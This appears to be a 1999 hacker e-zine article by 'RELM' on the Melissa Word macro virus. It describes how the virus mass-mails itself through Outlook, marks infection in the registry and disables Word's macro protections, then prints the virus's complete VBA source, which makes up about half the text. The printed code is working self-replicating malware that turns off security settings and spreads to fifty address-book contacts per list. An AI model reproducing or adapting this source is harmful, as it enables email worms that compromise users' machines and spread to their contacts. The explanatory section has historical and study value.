::::::::::::::::::::::::::::::::::::::::::::::::::::::::May/99
::: The Discordant Opposition Journal ::: Issue 5 - File 4 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:A Look At The Melissa Word Macro Virus:
 By RELM

[The Virus]
Im sure you have heard about the Melissa Virus, Most people have. The Microsoft Word virus known as Melissa started spreading Friday, March26, 1999, This virus spread fast threw the internet. In just a couple of days this virus spread Worldwide and infected Thousands If not Millions of computers around the world faster then any virus to date. This virus spreads when you execute an infected document, If you use Outlook shipped with Internet Explorer 4.+ as your mail client then the Melissa virus would send itself to the first fifty people on your address book. Now the fifty people on your address book would send the virus to another fifty people so on and so on.

[The Job]
The Melissa virus infects MS Word 97 and MS Word 2000 documents and goes about by adding a new VBA5 module named Melissa. Now before the virus attempts to do a mass mailing it looks for the following registry key in the registry: "HKEY_CURRENT_USER\Software\Microsoft\Office\" as "Melissa?" value.
If the virus finds this value in the key "Melissa?" set to the value "... by Kwyjibo" it will not attempt another mass mailing because a mass mailing has allready been done on the current machine. If the virus does not find this value in the key then it will attempt a mass mailing, First the virus would open Outlook then useing MAPI calls it would use the user profile set in Outlook, The virus would then create a new E-mail message with the following subject "Important Message From Joe" (Joe being the user profile), Then the body of the e-mail would say "Here is that document you asked for ...don't show anyone else ;-)", Next the virus would create an attachment to the e-mail and the attachment would be the infected Word document, After this is done the sequence is complete and the messages are mailed to the fifty people on the users address book.

[The Virus Creates Security For Itself]
To create more security the virus deactivates the Tool-Macro Menu is MS Word 97 and in MS Word 2000 it deactivates the Macro-Security Menu. Now to hide its infection activities the virus disables the Save Normal Template Option, The Confirm conversion at Open option and the Macro virus protection option. Doing this would make the user to not be able to know that there is a macro virus in the document.

[Just For Fun]
Once every hour the virus triggers an action, At a certain min (A Minute that is specified) past the hour corresponding to the date, If you open a infected document at the appropriate minute the virus will insert the following text "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." into the infected document.

[Conclusion]
The base of the melissa virus is not unusual, The thing that is unusual about the virus is the way it spreads threw e-mail and how it travels threw the internet in such little time. Now you should by now have a clear understanding of the Melissa Virus and the way it works, I have tried to outline some inportant facts about the virus and hopefully give you a better understanding of it. Everything that I have explained in this document can be clearly seen in the source code at the bottom of this text.


[The Code]
This is the Melissa Word Macro Virus code, I trust that you will use this for nothing more then learning.


/--------The Melissa Word Macro Virus Code: Start--------\




Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
  CommandBars("Macro").Controls("Security...").Enabled = False
  System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
  CommandBars("Tools").Controls("Macro").Enabled = False
  Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
  If UngaDasOutlook = "Outlook" Then
    DasMapiName.Logon "profile", "password"
    For y = 1 To DasMapiName.AddressLists.Count
        Set AddyBook = DasMapiName.AddressLists(y)
        x = 1
        Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
        For oo = 1 To AddyBook.AddressEntries.Count
            Peep = AddyBook.AddressEntries(x)
            BreakUmOffASlice.Recipients.Add Peep
            x = x + 1
            If x > 50 Then oo = AddyBook.AddressEntries.Count
         Next oo
         BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
         BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
         BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
         BreakUmOffASlice.Send
         Peep = ""
    Next y
    DasMapiName.Logoff
  End If
  System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If


Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
  If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
  Set ToInfect = ADI1
  ADI1.Name = "Melissa"
  DoAD = True
End If

If NTI1.Name <> "Melissa" Then
  If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
  Set ToInfect = NTI1
  NTI1.Name = "Melissa"
  DoNT = True
End If
    
If DoNT <> True And DoAD <> True Then GoTo CYA

If DoNT = True Then
  Do While ADI1.CodeModule.Lines(1, 1) = ""
    ADI1.CodeModule.DeleteLines 1
  Loop
  ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
  Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
    ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
    BGN = BGN + 1
  Loop
End If
  
If DoAD = True Then
  Do While NTI1.CodeModule.Lines(1, 1) = ""
    NTI1.CodeModule.DeleteLines 1
  Loop
  ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
  Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
    ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
    BGN = BGN + 1
  Loop
End If

CYA:

If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
  ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
  ActiveDocument.Saved = True 
End If

'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters.  Game's over.  I'm outta here."
End Sub


\--------The Melissa Word Macro Virus Code: End--------/


This concludes the Melissa Word Macro Virus Text written by Relm.
Please Visit The Fallen Angels Webpage At:
http://fallenangelz.cjb.net